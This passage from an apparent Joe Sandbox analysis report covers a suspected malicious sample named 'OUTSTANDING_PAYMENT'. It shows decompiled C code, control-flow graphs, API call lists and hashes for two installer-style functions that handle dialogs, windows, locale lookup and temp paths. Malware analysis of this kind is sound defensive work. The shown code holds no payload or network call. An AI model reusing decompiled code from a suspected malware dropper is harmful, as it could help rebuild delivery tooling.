                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2295610775-0
                                                                                                                        • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                                                        • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                                                                                        • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                                                                                        • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357windowstringCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 141 4040c5-4040d7 142 4040dd-4040e3 141->142 143 40423e-40424d 141->143 142->143 144 4040e9-4040f2 142->144 145 40429c-4042b1 143->145 146 40424f-40428a GetDlgItem * 2 call 4045c4 KiUserCallbackDispatcher call 40140b 143->146 149 4040f4-404101 SetWindowPos 144->149 150 404107-40410e 144->150 147 4042f1-4042f6 call 404610 145->147 148 4042b3-4042b6 145->148 167 40428f-404297 146->167 163 4042fb-404316 147->163 152 4042b8-4042c3 call 401389 148->152 153 4042e9-4042eb 148->153 149->150 155 404110-40412a ShowWindow 150->155 156 404152-404158 150->156 152->153 177 4042c5-4042e4 SendMessageW 152->177 153->147 162 404591 153->162 164 404130-404143 GetWindowLongW 155->164 165 40422b-404239 call 40462b 155->165 158 404171-404174 156->158 159 40415a-40416c DestroyWindow 156->159 169 404176-404182 SetWindowLongW 158->169 170 404187-40418d 158->170 166 40456e-404574 159->166 168 404593-40459a 162->168 173 404318-40431a call 40140b 163->173 174 40431f-404325 163->174 164->165 175 404149-40414c ShowWindow 164->175 165->168 166->162 180 404576-40457c 166->180 167->145 169->168 170->165 176 404193-4041a2 GetDlgItem 170->176 173->174 181 40432b-404336 174->181 182 40454f-404568 DestroyWindow EndDialog 174->182 175->156 184 4041c1-4041c4 176->184 185 4041a4-4041bb SendMessageW IsWindowEnabled 176->185 177->168 180->162 186 40457e-404587 ShowWindow 180->186 181->182 183 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 181->183 182->166 213 404393-4043cf ShowWindow EnableWindow call 4045e6 EnableWindow 183->213 214 40438b-404390 183->214 188 4041c6-4041c7 184->188 189 4041c9-4041cc 184->189 185->162 185->184 186->162 191 4041f7-4041fc call 40459d 188->191 192 4041da-4041df 189->192 193 4041ce-4041d4 189->193 191->165 196 404215-404225 SendMessageW 192->196 198 4041e1-4041e7 192->198 193->196 197 4041d6-4041d8 193->197 196->165 197->191 201 4041e9-4041ef call 40140b 198->201 202 4041fe-404207 call 40140b 198->202 209 4041f5 201->209 202->165 211 404209-404213 202->211 209->191 211->209 217 4043d1-4043d2 213->217 218 4043d4 213->218 214->213 219 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 404406-404417 SendMessageW 219->220 221 404419 219->221 222 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 220->222 221->222 222->163 233 404464-404466 222->233 233->163 234 40446c-404470 233->234 235 404472-404478 234->235 236 40448f-4044a3 DestroyWindow 234->236 235->162 237 40447e-404484 235->237 236->166 238 4044a9-4044d6 CreateDialogParamW 236->238 237->163 239 40448a 237->239 238->166 240 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 404535-40454d ShowWindow call 404610 240->245 245->166
                                                                                                                        C-Code - Quality: 84%
                                                                                                                        			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
				struct HWND__* _v28;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				signed int _t36;
				signed int _t38;
				struct HWND__* _t48;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t117;
				int _t118;
				int _t122;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				intOrPtr _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t145;

				_t130 = _a8;
				if(_t130 == 0x110 || _t130 == 0x408) {
					_t34 = _a12;
					_t127 = _a4;
					__eflags = _t130 - 0x110;
					 *0x423730 = _t34;
					if(_t130 == 0x110) {
						 *0x42a268 = _t127;
						 *0x423744 = GetDlgItem(_t127, 1);
						_t91 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x421710 = _t91;
						E004045C4(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
						 *0x42922c = E0040140B(4);
						_t34 = 1;
						__eflags = 1;
						 *0x423730 = 1;
					}
					_t124 =  *0x40a39c; // 0x0
					_t136 = 0;
					_t133 = (_t124 << 6) +  *0x42a280;
					__eflags = _t124;
					if(_t124 < 0) {
						L36:
						E00404610(0x40b);
						while(1) {
							_t36 =  *0x423730;
							 *0x40a39c =  *0x40a39c + _t36;
							_t133 = _t133 + (_t36 << 6);
							_t38 =  *0x40a39c; // 0x0
							__eflags = _t38 -  *0x42a284;
							if(_t38 ==  *0x42a284) {
								E0040140B(1);
							}
							__eflags =  *0x42922c - _t136;
							if( *0x42922c != _t136) {
								break;
							}
							__eflags =  *0x40a39c -  *0x42a284; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t133 + 0x14);
							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004045C4(_t127);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004045C4(_t127);
							_t48 = GetDlgItem(_t127, 3);
							__eflags =  *0x42a2ec - _t136;
							_v28 = _t48;
							if( *0x42a2ec != _t136) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t48, _t117 & 0x00000008);
							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
							E004045E6(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x421710, _t118);
							__eflags = _t118 - _t136;
							if(_t118 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
							__eflags =  *0x42a2ec - _t136;
							if( *0x42a2ec == _t136) {
								_push( *0x423744);
							} else {
								SendMessageW(_t127, 0x401, 2, _t136);
								_push( *0x421710);
							}
							E004045F9();
							E00406668(0x423748, E004040A6());
							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t127, 0x423748);
							_push(_t136);
							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x429238);
									 *0x422720 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L60;
									}
									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
									__eflags = _t73 - _t136;
									 *0x429238 = _t73;
									if(_t73 == _t136) {
										goto L60;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004045C4(_t73);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t127, _t137 + 0x10);
									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x42922c - _t136;
									if( *0x42922c != _t136) {
										goto L63;
									}
									ShowWindow( *0x429238, 8);
									E00404610(0x405);
									goto L60;
								}
								__eflags =  *0x42a2ec - _t136;
								if( *0x42a2ec != _t136) {
									goto L63;
								}
								__eflags =  *0x42a2e0 - _t136;
								if( *0x42a2e0 != _t136) {
									continue;
								}
								goto L63;
							}
						}
						DestroyWindow( *0x429238); // executed
						 *0x42a268 = _t136;
						EndDialog(_t127,  *0x421f18);
						goto L60;
					} else {
						__eflags = _t34 - 1;
						if(_t34 != 1) {
							L35:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L63;
							}
							goto L36;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L35;
						}
						SendMessageW( *0x429238, 0x40f, 0, 1);
						__eflags =  *0x42922c;
						return 0 |  *0x42922c == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t136 = 0;
					if(_t130 == 0x47) {
						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
					}
					_t122 = _a12;
					if(_t130 != 5) {
						L8:
						if(_t130 != 0x40d) {
							__eflags = _t130 - 0x11;
							if(_t130 != 0x11) {
								__eflags = _t130 - 0x111;
								if(_t130 != 0x111) {
									goto L28;
								}
								_t135 = _t122 & 0x0000ffff;
								_t128 = GetDlgItem(_t127, _t135);
								__eflags = _t128 - _t136;
								if(_t128 == _t136) {
									L15:
									__eflags = _t135 - 1;
									if(_t135 != 1) {
										__eflags = _t135 - 3;
										if(_t135 != 3) {
											_t129 = 2;
											__eflags = _t135 - _t129;
											if(_t135 != _t129) {
												L27:
												SendMessageW( *0x429238, 0x111, _t122, _a16);
												goto L28;
											}
											__eflags =  *0x42a2ec - _t136;
											if( *0x42a2ec == _t136) {
												_t99 = E0040140B(3);
												__eflags = _t99;
												if(_t99 != 0) {
													goto L28;
												}
												 *0x421f18 = 1;
												L23:
												_push(0x78);
												L24:
												E0040459D();
												goto L28;
											}
											E0040140B(_t129);
											 *0x421f18 = _t129;
											goto L23;
										}
										__eflags =  *0x40a39c - _t136; // 0x0
										if(__eflags <= 0) {
											goto L27;
										}
										_push(0xffffffff);
										goto L24;
									}
									_push(_t135);
									goto L24;
								}
								SendMessageW(_t128, 0xf3, _t136, _t136);
								_t103 = IsWindowEnabled(_t128);
								__eflags = _t103;
								if(_t103 == 0) {
									L63:
									return 0;
								}
								goto L15;
							}
							SetWindowLongW(_t127, _t136, _t136);
							return 1;
						}
						DestroyWindow( *0x429238);
						 *0x429238 = _t122;
						L60:
						_t145 =  *0x425748 - _t136; // 0x0
						if(_t145 == 0 &&  *0x429238 != _t136) {
							ShowWindow(_t127, 0xa);
							 *0x425748 = 1;
						}
						goto L63;
					} else {
						asm("sbb eax, eax");
						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
							L28:
							return E0040462B(_a8, _t122, _a16);
						} else {
							ShowWindow(_t127, 4);
							goto L8;
						}
					}
				}
			}
































                                                                                                                        0x004040d0
                                                                                                                        0x004040d7
                                                                                                                        0x0040423e
                                                                                                                        0x00404242
                                                                                                                        0x00404246
                                                                                                                        0x00404248
                                                                                                                        0x0040424d
                                                                                                                        0x00404258
                                                                                                                        0x00404263
                                                                                                                        0x00404268
                                                                                                                        0x0040426a
                                                                                                                        0x0040426c
                                                                                                                        0x0040426f
                                                                                                                        0x00404274
                                                                                                                        0x00404282
                                                                                                                        0x0040428f
                                                                                                                        0x00404296
                                                                                                                        0x00404296
                                                                                                                        0x00404297
                                                                                                                        0x00404297
                                                                                                                        0x0040429c
                                                                                                                        0x004042a2
                                                                                                                        0x004042a9
                                                                                                                        0x004042af
                                                                                                                        0x004042b1
                                                                                                                        0x004042f1
                                                                                                                        0x004042f6
                                                                                                                        0x004042fb
                                                                                                                        0x004042fb
                                                                                                                        0x00404300
                                                                                                                        0x00404309
                                                                                                                        0x0040430b
                                                                                                                        0x00404310
                                                                                                                        0x00404316
                                                                                                                        0x0040431a
                                                                                                                        0x0040431a
                                                                                                                        0x0040431f
                                                                                                                        0x00404325
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00404330
                                                                                                                        0x00404336
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040433f
                                                                                                                        0x00404347
                                                                                                                        0x0040434c
                                                                                                                        0x0040434f
                                                                                                                        0x00404355
                                                                                                                        0x0040435a
                                                                                                                        0x0040435d
                                                                                                                        0x00404363
                                                                                                                        0x00404368
                                                                                                                        0x0040436b
                                                                                                                        0x00404371
                                                                                                                        0x00404379
                                                                                                                        0x0040437f
                                                                                                                        0x00404385
                                                                                                                        0x00404389
                                                                                                                        0x00404390
                                                                                                                        0x00404390
                                                                                                                        0x00404390
                                                                                                                        0x0040439a
                                                                                                                        0x004043ac
                                                                                                                        0x004043b8
                                                                                                                        0x004043bd
                                                                                                                        0x004043c7
                                                                                                                        0x004043cd
                                                                                                                        0x004043cf
                                                                                                                        0x004043d4
                                                                                                                        0x004043d1
                                                                                                                        0x004043d1
                                                                                                                        0x004043d1
                                                                                                                        0x004043e4
                                                                                                                        0x004043fc
                                                                                                                        0x004043fe
                                                                                                                        0x00404404
                                                                                                                        0x00404419
                                                                                                                        0x00404406
                                                                                                                        0x0040440f
                                                                                                                        0x00404411
                                                                                                                        0x00404411
                                                                                                                        0x0040441f
                                                                                                                        0x00404430
                                                                                                                        0x00404446
                                                                                                                        0x0040444d
                                                                                                                        0x00404453
                                                                                                                        0x00404457
                                                                                                                        0x0040445c
                                                                                                                        0x0040445e
                                                                                                                        0x00000000
                                                                                                                        0x00404464
                                                                                                                        0x00404464
                                                                                                                        0x00404466
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040446c
                                                                                                                        0x00404470
                                                                                                                        0x00404495
                                                                                                                        0x0040449b
                                                                                                                        0x004044a1
                                                                                                                        0x004044a3
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004044c9
                                                                                                                        0x004044cf
                                                                                                                        0x004044d1
                                                                                                                        0x004044d6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004044dc
                                                                                                                        0x004044df
                                                                                                                        0x004044e2
                                                                                                                        0x004044f9
                                                                                                                        0x00404505
                                                                                                                        0x0040451e
                                                                                                                        0x00404524
                                                                                                                        0x00404528
                                                                                                                        0x0040452d
                                                                                                                        0x00404533
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040453d
                                                                                                                        0x00404548
                                                                                                                        0x00000000
                                                                                                                        0x00404548
                                                                                                                        0x00404472
                                                                                                                        0x00404478
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040447e
                                                                                                                        0x00404484
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x0040448a
                                                                                                                        0x0040445e
                                                                                                                        0x00404555
                                                                                                                        0x00404561
                                                                                                                        0x00404568
                                                                                                                        0x00000000
                                                                                                                        0x004042b3
                                                                                                                        0x004042b3
                                                                                                                        0x004042b6
                                                                                                                        0x004042e9
                                                                                                                        0x004042e9
                                                                                                                        0x004042eb
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004042eb
                                                                                                                        0x004042b8
                                                                                                                        0x004042bc
                                                                                                                        0x004042c1
                                                                                                                        0x004042c3
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004042d3
                                                                                                                        0x004042db
                                                                                                                        0x00000000
                                                                                                                        0x004042e1
                                                                                                                        0x004040e9
                                                                                                                        0x004040e9
                                                                                                                        0x004040ed
                                                                                                                        0x004040f2
                                                                                                                        0x00404101
                                                                                                                        0x00404101
                                                                                                                        0x00404107
                                                                                                                        0x0040410e
                                                                                                                        0x00404152
                                                                                                                        0x00404158
                                                                                                                        0x00404171
                                                                                                                        0x00404174
                                                                                                                        0x00404187
                                                                                                                        0x0040418d
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00404193
                                                                                                                        0x0040419e
                                                                                                                        0x004041a0
                                                                                                                        0x004041a2
                                                                                                                        0x004041c1
                                                                                                                        0x004041c1
                                                                                                                        0x004041c4
                                                                                                                        0x004041c9
                                                                                                                        0x004041cc
                                                                                                                        0x004041dc
                                                                                                                        0x004041dd
                                                                                                                        0x004041df
                                                                                                                        0x00404215
                                                                                                                        0x00404225
                                                                                                                        0x00000000
                                                                                                                        0x00404225
                                                                                                                        0x004041e1
                                                                                                                        0x004041e7
                                                                                                                        0x00404200
                                                                                                                        0x00404205
                                                                                                                        0x00404207
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00404209
                                                                                                                        0x004041f5
                                                                                                                        0x004041f5
                                                                                                                        0x004041f7
                                                                                                                        0x004041f7
                                                                                                                        0x00000000
                                                                                                                        0x004041f7
                                                                                                                        0x004041ea
                                                                                                                        0x004041ef
                                                                                                                        0x00000000
                                                                                                                        0x004041ef
                                                                                                                        0x004041ce
                                                                                                                        0x004041d4
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x004041d6
                                                                                                                        0x00000000
                                                                                                                        0x004041d6
                                                                                                                        0x004041c6
                                                                                                                        0x00000000
                                                                                                                        0x004041c6
                                                                                                                        0x004041ac
                                                                                                                        0x004041b3
                                                                                                                        0x004041b9
                                                                                                                        0x004041bb
                                                                                                                        0x00404591
                                                                                                                        0x00000000
                                                                                                                        0x00404591
                                                                                                                        0x00000000
                                                                                                                        0x004041bb
                                                                                                                        0x00404179
                                                                                                                        0x00000000
                                                                                                                        0x00404181
                                                                                                                        0x00404160
                                                                                                                        0x00404166
                                                                                                                        0x0040456e
                                                                                                                        0x0040456e
                                                                                                                        0x00404574
                                                                                                                        0x00404581
                                                                                                                        0x00404587
                                                                                                                        0x00404587
                                                                                                                        0x00000000
                                                                                                                        0x00404110
                                                                                                                        0x00404115
                                                                                                                        0x00404121
                                                                                                                        0x0040412a
                                                                                                                        0x0040422b
                                                                                                                        0x00000000
                                                                                                                        0x00404149
                                                                                                                        0x0040414c
                                                                                                                        0x00000000
                                                                                                                        0x0040414c
                                                                                                                        0x0040412a
                                                                                                                        0x0040410e

                                                                                                                        APIs
                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                                                                                        • ShowWindow.USER32(?), ref: 00404121
                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                                                                                        • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                                                                                        • DestroyWindow.USER32 ref: 00404160
                                                                                                                        • SetWindowLongW.USER32 ref: 00404179
                                                                                                                        • GetDlgItem.USER32 ref: 00404198
                                                                                                                        • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                                                                                        • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                                                                                        • GetDlgItem.USER32 ref: 0040425E
                                                                                                                        • GetDlgItem.USER32 ref: 00404268
                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                                                                                                                        • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                                                                                        • GetDlgItem.USER32 ref: 00404379
                                                                                                                        • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                                                                                        • EnableWindow.USER32(?,?), ref: 004043AC
                                                                                                                        • EnableWindow.USER32(?,?), ref: 004043C7
                                                                                                                        • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                                                                                        • EnableMenuItem.USER32 ref: 004043E4
                                                                                                                        • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                                                                                        • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                                                                                        • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                                                                                        • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                                                                                        • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.267312472.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.267308244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267321764.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267331125.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.267370206.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_OUTSTANDING_PAYMENT.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                        • String ID: H7B
                                                                                                                        • API String ID: 2475350683-2300413410
                                                                                                                        • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                                                                        • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                                                                                        • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                                                                                        • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                                                                                        Download Yara Rule

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d41 call 4065af 248->251 252 403d43-403d7a call 406536 248->252 261 403d9d-403dc6 call 403fed call 40603f 251->261 257 403d92-403d98 lstrcatW 252->257 258 403d7c-403d8d call 406536 252->258 257->261 258->257 266 403e58-403e60 call 40603f 261->266 267 403dcc-403dd1 261->267 273 403e62-403e69 call 4066a5 266->273 274 403e6e-403e93 LoadImageW 266->274 267->266 269 403dd7-403dff call 406536 267->269 269->266 275 403e01-403e05 269->275 273->274 277 403f14-403f1c call 40140b 274->277 278 403e95-403ec5 RegisterClassW 274->278 279 403e17-403e23 lstrlenW 275->279 280 403e07-403e14 call 405f64 275->280 291 403f26-403f31 call 403fed 277->291 292 403f1e-403f21 277->292 281 403fe3 278->281 282 403ecb-403f0f SystemParametersInfoW CreateWindowExW 278->282 286 403e25-403e33 lstrcmpiW 279->286 287 403e4b-403e53 call 405f37 call 406668 279->287 280->279 285 403fe5-403fec 281->285 282->277 286->287 290 403e35-403e3f GetFileAttributesW 286->290 287->266 294 403e41-403e43 290->294 295 403e45-403e46 call 405f83 290->295 301 403f37-403f51 ShowWindow call 4069c5 291->301 302 403fba-403fc2 call 40579d 291->302 292->285 294->287 294->295 295->287 307 403f53-403f58 call 4069c5 301->307 308 403f5d-403f6f GetClassInfoW 301->308 309 403fc4-403fca 302->309 310 403fdc-403fde call 40140b 302->310 307->308 313 403f71-403f81 GetClassInfoW RegisterClassW 308->313 314 403f87-403faa DialogBoxParamW call 40140b 308->314 309->292 315 403fd0-403fd7 call 40140b 309->315 310->281 313->314 319 403faf-403fb8 call 403c67 314->319 315->292 319->285
                                                                                                                        C-Code - Quality: 96%
                                                                                                                        			E00403D17(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x42a270;
				_t22 = E00406A35(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x423748;
					L"1033" = 0x30;
					 *0x437002 = 0x78;
					 *0x437004 = 0;
					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
					__eflags =  *0x423748;
					if(__eflags == 0) {
						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E004065AF(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403FED(_t78, _t90);
				_t86 = L"C:\\Users\\hardz\\AppData\\Local\\Temp";
				 *0x42a2e0 =  *0x42a278 & 0x00000020;
				 *0x42a2fc = 0x10000;
				if(E0040603F(_t90, L"C:\\Users\\hardz\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E0040603F(_t98, _t86) == 0) {
						E004066A5(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118)));
					}
					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x429248 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403FED(_t78, __eflags);
							__eflags =  *0x42a300;
							if( *0x42a300 != 0) {
								_t33 = E0040579D(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x42922c;
								if( *0x42922c == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x423728, 5); // executed
							_t39 = E004069C5("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E004069C5("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x429200);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x429200);
								 *0x429224 = _t87;
								RegisterClassW(0x429200);
							}
							_t44 = DialogBoxParamW( *0x42a260,  *0x429240 + 0x00000069 & 0x0000ffff, 0, E004040C5, 0); // executed
							E00403C67(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x42a260;
						 *0x429204 = E00401000;
						 *0x429210 =  *0x42a260;
						 *0x429214 = _t30;
						 *0x429224 = 0x40a3b4;
						if(RegisterClassW(0x429200) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x423728 = CreateWindowExW(0x80, 0x40a3b4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42a260, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x428200;
					E00406536(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x42a298 + _t78 * 2,  *0x42a298 +  *(_t82 + 0x4c) * 2, 0x428200, 0);
					_t63 =  *0x428200; // 0x22
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x428202;
						 *((short*)(E00405F64(0x428202, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406668(_t86, E00405F37(_t76));
						goto L16;
					} else {
